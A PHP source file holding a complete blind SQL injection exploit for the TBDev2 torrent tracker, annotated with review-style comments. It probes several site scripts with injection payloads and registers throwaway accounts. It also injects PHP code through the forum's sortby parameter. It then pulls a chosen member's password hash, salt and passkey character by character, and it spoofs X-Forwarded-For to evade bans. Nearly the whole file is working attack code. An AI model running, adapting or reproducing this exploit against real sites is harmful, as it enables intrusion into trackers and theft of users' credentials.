<?php
/*+---------------------------------------------------------+
| TBDev2 Blind SQL Injection Exploit (v 3.3) |
| |
| Автор: Rostov114 |
| Основан на Exploit от Qwazar |
| |
| Благодарности: +toxa+, NitroIMX, Draco, antichat.ru |
| HAXTA4OK |
+---------------------------------------------------------+*/
// Runtime setup for a long-running CLI run: no execution time limit, keep
// going if the caller disconnects, and mask E_NOTICE (the script indexes
// regex match arrays that may be empty).
error_reporting(E_ALL & ~E_NOTICE);
ignore_user_abort(true);
set_time_limit(0);
/**
 * Log in with the given credentials and return the Cookie header value the
 * later requests should carry, or false when no usable cookie came back.
 *
 * Posts username/password to takelogin.php through send_xpl() and scrapes
 * the Set-Cookie headers of the raw response: either uid + pass (a 32-char
 * value) or a 32-char session value. A session cookie takes precedence.
 *
 * @param string $url      target base URL (send_xpl() normalises the path)
 * @param string $name     account name; sent in the body without urlencode()
 * @param string $password account password; likewise unencoded
 * @return string|false    "session=...;" or "uid=...; pass=...;" or false
 */
function getcookie($url, $name, $password){
$res = send_xpl($url,"username=$name&password=$password", 'login');
// "(\d+)*" allows the group to match zero times, so $matches[1] can be ''
// — isset('') is true, which still counts as a successful login below.
preg_match("/Set-Cookie: uid=(\d+)*;/", $res, $matches);
$uid = $matches[1];
// The class [\w+\d+] also admits a literal '+'; for 32-char hex values
// this makes no difference.
preg_match("/Set-Cookie: pass=([\w+\d+]{32});/", $res, $matches);
$passhash = $matches[1];
preg_match("/Set-Cookie: session=([\w+\d+]{32});/", $res, $matches);
$session = $matches[1];
// When a pattern did not match, $matches[1] is null (notice masked), so
// isset() is false for the missing values.
if(isset($session))
$res = "session=$session;";
else
$res = "uid=$uid; pass=$passhash;";
if((isset($uid) and isset($passhash)) or isset($session))
return $res;
else
return false;
}
/**
 * Build one raw HTTP/1.0 request of kind $type for $url, send it to the first
 * address in the global $ips on port 80 and return the whole raw response
 * (status line, headers and body as one string).
 *
 * Globals read: $id (member id, embedded only in the 'forum' request target),
 * $cookie (sent as Cookie: by the cookie-bearing kinds), $formated (sent as
 * X-Forwarded-For when non-empty), $ips (from getaddrbyname()). Global
 * written: $name — the 'reg' case stores the generated account name there.
 *
 * @param string $url     target base URL; a '/' is appended to the path if missing
 * @param mixed  $xpl     kind-specific payload: the complete login body, a
 *                        form field value, or a request target fragment
 * @param string $type    one of the case labels in the switch below
 * @param int    $no_read accepted but never used
 * @return string         raw response; on a connect failure or an empty
 *                        response the function die()s instead of returning
 *
 * Review notes: $xpl is placed into request targets and POST bodies without
 * urlencode(); the body literals below are kept exactly as found on the page,
 * including stray whitespace inside several of them; and the die() calls
 * leave callers no way to handle a failed request.
 */
function send_xpl($url, $xpl, $type, $no_read=0){
global $id, $cookie, $name, $formated, $ips;
$res = '';
$u = parse_url($url);
// Ensure the path ends in '/'; the '.=' in the false branch is what appends
// it. A URL without a path leaves $u['path'] unset (substr() on null is
// deprecated since PHP 8.1).
$u['path'] = (substr($u['path'], (strlen($u['path'])-1), strlen($u['path'])) == '/') ? $u['path'] : $u['path'] .= '/';
switch($type)
{
// 'login': $xpl is already the full form body (see getcookie()).
case 'login':
$data = $xpl;
$req = "POST ".$u['path']."takelogin.php HTTP/1.0\r\n";
break;
// Signup-form probes: $xpl goes into the email field.
case 'takesignup':
$data = "wantuse rname=admin&wantpas sword=12345 6&passagain=123456&gender=1&country=1&year=1970&mon th=01&day=01&";
$data .= "rulesverify=yes &faqverify=ye s&ageverify=yes &email={$xpl}";
$req = "POST ".$u['path']."takesignup.php HTTP/1.0\r\n";
break;
case 'check':
$data = "action=email&email={$xpl}";
$req = "POST ".$u['path']."check_signup.php HTTP/1.0\r\n";
break;
/*case 'open_way':
$req ="GET ".$u['path']."details.php?id[]= HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;*/
// Cookie-bearing POST probes (require $cookie from getcookie() or 'reg').
case 'sendbonus':
$data = "amount=1&nick={$xpl}";
$req = "POST ".$u['path']."sendbonus.php HTTP/1.0\r\n";
$req.="Cookie: $cookie\r\n";
break;
// 'do_reg': fetches signup.php so that 'reg' can scrape the imagehash token.
case 'do_reg':
$data = "agree=yes&do=register";
$req = "POST ".$u['path']."signup.php HTTP/1.0\r\n";
break;
case 'bonuscode':
$data = "csub=1&code={$xpl}";
$req = "POST ".$u['path']."bonuscode.php HTTP/1.0\r\n";
$req.="Cookie: $cookie\r\n";
break;
/*case 'rss_file':
list($file, $path, $type) = $xpl;
$req ="GET ".$u['path']."rss.php?passkey=-1'+union+select+{$type}+from+use rs+where+id={$id}+in to+outfile+'{$path}to rrents/images/{$file}.txt'+--+ HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;*/
// 'rss_sql': the header block is already terminated here (trailing blank
// line); see the note above the post-switch header append below.
case 'rss_sql':
$req ="GET ".$u['path']."rss.php?passkey=$xpl HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Connection: Close\r\n\r\n";
break;
// 'reg': self-registers a throwaway account named by gen_name(). The
// captcha hash is scraped from signup.php via a recursive 'do_reg' call and
// falls back to '0' when absent; the email is built from the target host.
case 'reg':
$name = gen_name();
preg_match('/name="imagehash" value="([\w+\d+]{32})"/', send_xpl($url, '', 'do_reg'), $match);
$match[1] = $match[1] ? $match[1] : '0';
$data = "wantu sername={$name}&wantpassword=123456&passag ain=123456&gender=1&country=1&year =1970&month=01& day=01&";
$data .= "rulesverify=yes&f aqverify=yes&ageverify=yes&invite=000000000000 00000000000000000000&imagestring=0&";
$data .= "imagehash=".$match[1]."&email={$name}@".$u['host'];
$req = "POST ".$u['path']."takesignup.php HTTP/1.0\r\n";
break;
// GET probes that carry the session cookie; $xpl is the whole request
// target (script name plus query) relative to the base path.
case 'requests':
$req ="GET ".$u['path']."$xpl HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
case 'viewoffers':
$req ="GET ".$u['path']."$xpl HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
// 'forum': the sortby parameter of forum/forumdisplay.php carries PHP code;
// forum() expects var_export() output in the response. No cookie is sent.
case 'forum':
$req ="GET ".$u['path']."forum/forumdisplay.php?fid=2&sortby='];var_export(mysql_fetch_array(mysql_query('select+passhash,secr et,passkey,passkey_ip+fr om+users+wh ere+id={$id}')));exit();// HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="Connection: Close\r\n\r\n";
break;
}
// Append Host, X-Forwarded-For, Content-* and the body for the POST kinds.
// NOTE(review): 'rss_sql' is not in this exclusion list although its case
// already ended the header block, so these lines land after the blank line
// (as body text) with $data unset; 'open_way' and 'rss' have no live case.
if($type != 'requests' and $type != 'forum' and $type != 'open_way' and $type != 'rss' and $type != 'viewoffers')
{
$req .= "Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req .= "Content-Length: ".strlen($data)."\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Connection: close\r\n\r\n";
$req .= $data;
}
// Connect to the first address. "or die" applies to the assignment result,
// so a failed connect aborts the script right here; the "try the next
// address" fallback below is never reached.
foreach($ips as $k => $v)
{
$fs = @fsockopen($v, 80, $errno, $errstr, 30) or die("Error: $errno - $errstr\r\n");
if($fs) break;
}
if(!$fs) die("No living servers!\r\n");
fwrite($fs, $req);
// Read until the peer closes (Connection: close was requested).
while (feof($fs) == false) {
$res .= fread($fs, 8192);
}
fclose($fs);
if($res == '') die("Host die!\r\n");
return $res;
}
/**
 * Build the injection string for one boolean test on the users row with the
 * global $id: "does the ASCII code of character $pos of column $field satisfy
 * $condition?". $condition is operator plus value as concatenated by cond()
 * (e.g. '<77'); check_user() passes '-1'.
 *
 * Every template is the same MySQL IF(): the true branch yields a valid id,
 * the false branch a two-row subquery, so the server's error text becomes the
 * oracle that cond() looks for. Which template is used depends on the global
 * $type chosen by isVulnerable(). Values are '+'-separated, never
 * urlencode()d. The literals are kept exactly as found on the page.
 *
 * @param string $field     column name
 * @param string $condition comparison suffix appended to the ascii() call
 * @param int    $pos       1-based position for SUBSTRING()
 * @return string
 */
function xpl($field, $condition, $pos){
global $id, $type;
switch($type)
{
// requests.php: delivered through the requestid parameter (cookie GET).
case 'requests':
$xpl = "requests.php?action=reset&request id=-1+or+id=if(ascii(substring((select+$field+from+users+w here+id=$id),$pos,1))$condit ion,'1',(select+1+unio n+select+2))+--+";
break;
// viewoffers.php: delivered through the filter parameter (cookie GET).
case 'viewoffers':
$xpl = "viewoffers.php?filter=or+us ers.id=if(ascii(substring((select +$field+from+users+where+users. id=$id),$pos,1))$condition,'1', (select+1+union+select+2))+--+";
break;
// Quoted variant for rss.php (passkey) and bonuscode.php (code): the string
// literal is closed first, hence the leading "-1'" and the trailing "'".
case 'rss_sql':
case 'bonuscode':
$xpl = "-1'+or+ id=if(ascii(substrin g((select+$field+from+u sers+where+id=$id),$pos,1))$condition, '1',(select+1+union+select+2))+--+'";
break;
// Remaining kinds ('check', 'takesignup', 'sendbonus'): quoted variant with
// an "@ukrnet.ua" tail so the value passes as an email-shaped field.
default:
$xpl = "-1'+or+id=if(ascii (substring((select+$f ield+from+users+where+id=$id),$pos,1))$condition,'1',(sel ect+1+union+select+2))+--+ @ukrnet.ua";
break;
}
return $xpl;
}
/**
 * Produce an 11-character pseudo-random account name from a fixed letter set
 * (both cases, without 'q' and 'w', exactly as in the original alphabet).
 * rand() is not a CSPRNG; it is used only for a throwaway label here.
 *
 * @return string 11 letters
 */
function gen_name()
{
    $alphabet = 'abcdefghijklmnoprstuvxyz' . 'ABCDEFGHIJKLMNOPRSTUVXYZ';
    $last = strlen($alphabet) - 1;
    $out = '';
    for ($n = 0; $n < 11; $n++) {
        $out .= $alphabet[rand(0, $last)];
    }
    return $out;
}
/**
 * Oracle for one comparison: return 1 when "$field[$pos] $cond $ch" appears
 * to hold on the target, 0 otherwise.
 *
 * Prints one spinner frame from load(), sends the xpl() payload through
 * send_xpl() using the global $type and searches the raw response for the
 * MySQL error text: 'valid MySQL' for the quoted bonuscode/rss_sql templates,
 * 'Subquery returns' for the rest. Absence of the text is read as "true", so
 * any unrelated failure that hides the message is also reported as 1.
 *
 * @param string $url   target base URL
 * @param string $field column name
 * @param string $cond  comparison operator ('<', '>' from getChar())
 * @param int    $pos   1-based character position
 * @param int    $ch    ASCII value compared against
 * @return int          1 or 0 (an int, not a bool)
 */
function cond($url, $field, $cond, $pos, $ch) {
global $type;
print load();
if($type == 'bonuscode' or $type == 'rss_sql')
{
if(!preg_match('/valid MySQL/', send_xpl($url, xpl($field,$cond.$ch,$pos), $type)))
return 1;
else
return 0;
}
else
{
if(!preg_match('/Subquery returns/', send_xpl($url, xpl($field,$cond.$ch,$pos), $type)))
return 1;
else
return 0;
}
}
/**
 * Probe rss.php. The earlier file-write variant is kept only as commented-out
 * code and is announced as disabled; what remains is the SQL probe: set the
 * global $type to 'rss_sql', send the xpl() payload and report success when
 * the 'valid MySQL' error text is present.
 *
 * @param string $url target base URL
 * @return true|null  true when the error text appeared; otherwise prints a
 *                    message and returns null. $type stays 'rss_sql' in both
 *                    cases (isVulnerable() may overwrite it afterwards).
 */
function rss($url)
{
global $type;
/*preg_match('/<b>(\S+)details.php/', send_xpl($url, '', 'open_way'), $match);
if($match[1])
{
// Fix Windowz
$match[1] = str_replace('\\', '/', $match[1]);
$name = gen_name();
$xpl = array($name, $match[1], 'passhash');
send_xpl($url, $xpl, 'rss');
$file = @file($url.'torrents/images/'.$name.'.txt');
if(count($file) >= 2)
{
$file[1] = str_replace(array("\r\n", "\n"), "", $file[1]);
print 'Used method: rss'."\r\n";
echo "Trying to get passhash: ".$file[1]." [DONE]\r\n";
$name = gen_name();
$xpl = array($name, $match[1], 'secret');
send_xpl($url, $xpl, 'rss');
$file = @file($url.$name.'.txt');
$file[1] = str_replace(array("\r\n", "\n"), "", $file[1]);
die("Trying to get salt: ".$file[1]." [DONE]");
}
else
{
echo "File rss.php not vulnerable (file record).\r\n";
}
}
else
{
echo "Opening of ways - failed.\r\n";
}*/
echo "File rss.php - disable (file record).\r\n";
// Set before the probe and not reset on failure.
$type = 'rss_sql';
if(!preg_match('/valid MySQL/', send_xpl($url, xpl("passhash","=-1",1), 'rss_sql')))
{
echo "File rss.php not vulnerable (SQL attack).\r\n";
}else{return true;}
}
/**
 * Last-resort method: send the 'forum' request built by send_xpl() (its
 * sortby parameter carries PHP code) and read the var_export()-style pairs
 * 'passhash', 'secret', 'passkey_ip' and 'passkey' out of the response,
 * printing those selected by the global $atype.
 *
 * Control flow: die()s when no passhash pair is found, and die()s again after
 * printing the passkey, so the function returns normally only when neither
 * 'passkey' nor 'all' was requested. The class [\w+\d+] also admits a literal
 * '+', which is harmless for 32-char hex values.
 *
 * @param string $url target base URL
 */
function forum($url)
{
global $atype;
$res = send_xpl($url, '', 'forum');
if(!preg_match("/'passhash' => '([\w+\d+]{32})'/", $res, $match))
{
echo "Forum absents or not vulnerable.\r\n";
die( "Exploit failed: Target is not vulnerable.\r\n" );
}
else
print 'Used method: forum'."\r\n";
if(in_array('all', $atype) or in_array('passhash', $atype))
{
echo "Trying to get passhash: ".$match[1]." [DONE]\r\n";
}
if(in_array('all', $atype) or in_array('salt', $atype))
{
preg_match("/'secret' => '(\S+)'/", $res, $match);
echo "Trying to get salt: ".$match[1]." [DONE]\r\n";
}
if(in_array('all', $atype) or in_array('passkey', $atype))
{
echo "IP is tied to passkey: ";
// An empty passkey_ip value is reported as "No".
preg_match("/'passkey_ip' => '(\S+)'/", $res, $match);
echo $match[1] == '' ? "No\r\n" : "Yes\r\n";
preg_match("/'passkey' => '(\S+)'/", $res, $match);
die("Trying to get passkey: ".$match[1]." [DONE]\r\n");
}
}
/**
 * Abort the run when no users row with the global $id exists.
 *
 * Sends the xpl() probe with the condition '-1' (an arithmetic suffix rather
 * than a comparison) through the current global $type and treats the presence
 * of the MySQL error text — 'valid MySQL' for bonuscode/rss_sql, 'Subquery
 * returns' otherwise — as "no such user". Any other cause of that text is
 * reported the same way.
 *
 * @param string $url target base URL
 */
function check_user($url)
{
global $type, $id;
if($type == 'bonuscode' or $type == 'rss_sql')
{
if(preg_match('/valid MySQL/', send_xpl($url, xpl("passhash",'-1',1), $type)))
{
die("An user does not exist with ID {$id}\r\n");
}
}
else
{
if(preg_match('/Subquery returns/', send_xpl($url, xpl("passhash",'-1',1), $type)))
{
die("An user does not exist with ID {$id}\r\n");
}
}
}
/**
 * Console spinner: every call returns the next frame of the cycle \ | / -
 * followed by a backspace, so printing the results in sequence animates in
 * place over a single column.
 *
 * @return string one frame character plus chr(8)
 */
function load()
{
    static $frame = 0;
    $glyphs = ['\\', '|', '/', '-'];
    $out = $glyphs[$frame] . chr(8);
    $frame = ($frame + 1) % count($glyphs);
    return $out;
}
/**
 * Decide which injection point the target exposes and record it in the
 * global $type (and the global $cookie when a login or registration was done).
 *
 * Two modes, chosen by whether credentials were supplied:
 *  - with credentials: log in via getcookie(), then probe requests.php,
 *    sendbonus.php, bonuscode.php and viewoffers.php in that order; the first
 *    response carrying the MySQL error text wins, otherwise die().
 *  - without: probe check_signup.php and takesignup.php; failing those, try
 *    rss(), then self-register an account ('reg'), repeat the cookie-based
 *    probes and fall back to forum() last.
 *
 * Returns nothing; the outcome is communicated through the globals. The two
 * branches are not symmetric: the credential branch die()s after
 * viewoffers.php whereas the anonymous one goes on to forum().
 *
 * @param string       $url      target base URL
 * @param string|false $nickname login name, or false/'' for anonymous mode
 * @param string|false $password password for $nickname
 */
function isVulnerable($url, $nickname=false, $password=false) {
global $type, $cookie, $name;
// Loose comparison: the default false != '' is false, so missing
// credentials route to the anonymous branch.
if($nickname != '' and $password != '')
{
$type = 'requests';
echo "Login...";
// Assignment inside the condition; getcookie() returns false on failure.
if(!$cookie = getcookie($url, $nickname, $password))
{
echo "Fieled!\r\n";
die( "Incorrect login or password!\r\n" );
}
echo "OK!\r\n";
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'requests')))
{
echo "File requests.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'sendbonus';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'sendbonus')))
{
echo "File sendbonus.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'bonuscode';
if(!preg_match('/valid MySQL/', send_xpl($url, xpl("passhash","=-1",1), 'bonuscode')))
{
echo "File bonuscode.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'viewoffers';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'viewoffers')))
{
echo "File viewoffers.php absents or not vulnerable.\r\n";
die( "Exploit failed: Target is not vulnerable.\r\n" );
}
}
else
{
// Anonymous mode: xpl() uses its default template here because $type is
// still unset (its default case applies).
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'check')))
{
echo "File check_signup.php absents or not vulnerable.\r\n";
}
else
{
$type = 'check';
}
// $type is still unset unless check_signup.php matched above.
if(!$type)
{
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'takesignup')))
{
echo "File takesignup.php not vulnerable.\r\n";
// rss() sets $type = 'rss_sql' as a side effect and returns true only
// when that endpoint answered with the error text.
if(rss($url)) return;
echo "Register...";
$res = send_xpl($url, '', 'reg');
// Scrape the cookies of the freshly registered account; the mybb pair is
// optional. Note "[A-z0-9_]" spans the punctuation between 'Z' and 'a' too.
if(preg_match("/Set-Cookie: pass=([\w+\d+]{32});/", $res, $matches))
{
$passhash = $matches[1];
preg_match("/Set-Cookie: uid=(\d+)*;/", $res, $matches);
$uid=$matches[1];
$cookie = "uid=$uid; pass=$passhash;";
if(preg_match("/Set-Cookie: mybbuser=([A-z0-9_]+);/", $res, $matches))
{
$mybbuser = $matches[1];
preg_match("/Set-Cookie: hash=([\w+\d+]{32});/", $res, $matches);
$hash = $matches[1];
$cookie .= " hash=$hash; mybbuser=$mybbuser;";
}
// $name was filled in by send_xpl()'s 'reg' case.
echo "OK! User: {$name}\r\n";
$type = 'requests';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'requests')))
{
echo "File requests.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'sendbonus';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'sendbonus')))
{
echo "File sendbonus.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'bonuscode';
if(!preg_match('/valid MySQL/', send_xpl($url, xpl("passhash","=-1",1), 'bonuscode')))
{
echo "File bonuscode.php absents or not vulnerable.\r\n";
}else{return; }
$type = 'viewoffers';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'viewoffers')))
{
echo "File viewoffers.php absents or not vulnerable.\r\n";
forum($url);
}else{return; }
}
else
{
// Registration did not yield a pass cookie.
echo "Fieled!\r\n";
forum($url);
}
}
else
{
$type = 'takesignup';
}
}
}
}
/**
 * Recover one character of column $field at 1-based position $pos by bisecting
 * the ASCII window [$lb, $ub], with cond() as the oracle.
 *
 * Each step asks whether the byte is below the midpoint, then whether it is
 * above; when neither holds the midpoint is the answer. Up to two requests are
 * sent per step. Callers pass a narrowed window for hex values (47..103,
 * bracketing '0'..'f').
 *
 * @param string $url   target base URL
 * @param string $field column name
 * @param int    $pos   character position (SUBSTRING semantics)
 * @param int    $lb    inclusive lower bound of the window
 * @param int    $ub    inclusive upper bound of the window
 * @return string|int   the character, or int -1 once the bounds cross (value
 *                      outside the window, or an inconsistent oracle answer)
 */
function getChar($url, $field, $pos, $lb=0, $ub=255) {
while(true) {
// floor() yields a float; chr() below receives it via non-strict coercion.
$M = floor($lb + ($ub-$lb)/2);
if(cond($url, $field, '<', $pos, $M)==1) {
$ub = $M - 1;
}
else if(cond($url, $field, '>', $pos, $M)==1) {
$lb = $M + 1;
}
else
return chr($M);
// Bounds crossed: nothing left in the window.
if($lb > $ub)
return -1;
}
}
/**
 * Resolve $host with dns_get_record() and return the 'ip' field of every
 * record found, or false when the lookup fails or yields no addresses.
 *
 * @param string $host hostname to resolve
 * @param int    $type DNS_* record type constant (default DNS_A)
 * @return array|false list of address strings, or false
 */
function getaddrbyname($host, $type = DNS_A)
{
    $records = dns_get_record($host, $type);
    if (!is_array($records)) {
        return false;
    }
    $addresses = [];
    foreach ($records as $record) {
        $addresses[] = $record['ip'];
    }
    // Mirror the original "count == false" check: an empty list means failure.
    return $addresses === [] ? false : $addresses;
}
// Program banner (English rendering of the header comment at the top of the file).
$banner = [
    '+---------------------------------------------------+',
    '| TBDev2 Blind SQL Injection Exploit (v 3.3) |',
    '| |',
    '| Author: Rostov114 |',
    '| Based on Exploit from Qwazar |',
    '| |',
    '| Credits: +toxa+, NitroIMX, Draco, antichat.ru |',
    '| HAXTA4OK |',
    '+---------------------------------------------------+',
];
echo implode("\r\n", $banner), "\r\n\r\n";
// Usage text; shown (then exit) when fewer than two arguments — url and
// target id — were given on the command line.
if ($argc < 3) {
    $usage = [
        '+-----------------------------------------------------------------+',
        '| Multi mode: |',
        '| Using tbdev2sql.php url target_id type |',
        '| |',
        '| target_id - id of target member |',
        '| type - that tryning* |',
        '| Ex.: tbdev2xpl.php http://www.site.com/ 1 all |',
        '| |',
        '| Login exploit mode: |',
        '| Using tbdev2sql.php url target_id type login password |',
        '| |',
        '| target_id - id of target member |',
        '| login, password - login and password of any existing account |',
        '| type - that tryning* |',
        '| Ex.: tbdev2xpl.php http://www.site.com/ 1 all test 1234 |',
        '| |',
        '| |',
        '| * all - tryning passkey, salt, passhash |',
        '| passhash - tryning passhash |',
        '| salt - tryning salt |',
        '| passkey - tryning passkey |',
    ];
    echo implode("\r\n", $usage), "\r\n";
    exit('+-----------------------------------------------------------------+' . "\r\n");
}
// --- entry point: argument parsing, target resolution, method selection ---
// No-op at file scope: 'global' only has an effect inside a function body.
global $type, $formated, $ips, $atype, $id;
$url = $argv[1];
// Member id to extract. It is embedded verbatim in the templates of xpl() and
// send_xpl() with no integer check.
$id = $argv[2];
// Comma-separated selection of 'all', 'passhash', 'salt', 'passkey'.
$atype = explode(',', $argv[3]);
// Optional credentials; missing arguments read as null (notices are masked).
$nickname = $argv[4];
$pass = $argv[5];
$formated = ''; # when non-empty, send_xpl() sends this as X-Forwarded-For (original note: set it if the tracker has banned your address)
$u = parse_url($url);
$ips = getaddrbyname($u['host']);
if($ips)
echo 'A host '.$u['host'].' utillizes next addresses: '.implode(', ', $ips)."\r\n";
else
die('A host '.$u['host'].' not found!'."\r\n");
// Pick the injection point (sets the global $type), confirm the member id
// exists, then extract below.
isVulnerable($url, $nickname, $pass);
print 'Used method: '.$type."\r\n";
check_user($url);
// Extraction: each requested column is read one character at a time through
// getChar(), which issues up to two requests per bisection step; cond()
// prints a spinner frame for every request. The '$c == -1' checks are loose
// comparisons between a one-character string and the int sentinel.
if(in_array('all', $atype) or in_array('passhash', $atype))
{
echo "Trying to get passhash: ";
// 32-character hex value; window 47..103 brackets '0' (48) .. 'f' (102).
for($i=1;$i<=32;$i++){
$c = getChar($url, "passhash", $i, 47, 103);
if($c==-1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";
}
if(in_array('all', $atype) or in_array('salt', $atype))
{
echo "Trying to get salt: ";
// 20 characters over getChar()'s default 0..255 window.
for($i=1;$i<=20;$i++){
$c = getChar($url, "secret", $i);
if($c==-1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";
}
if(in_array('all', $atype) or in_array('passkey', $atype))
{
echo "IP is tied to passkey: ";
// Presence test only: is the first character of passkey_ip within 48..58?
echo getChar($url, "passkey_ip", 1, 48, 58) == -1 ? "No" : "Yes";
echo " [DONE]\r\n";
echo "Trying to get passkey: ";
// Same 32-character hex window as the passhash above.
for($i=1;$i<=32;$i++){
$c = getChar($url, "passkey", $i, 47, 103);
if($c==-1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";
}
?>
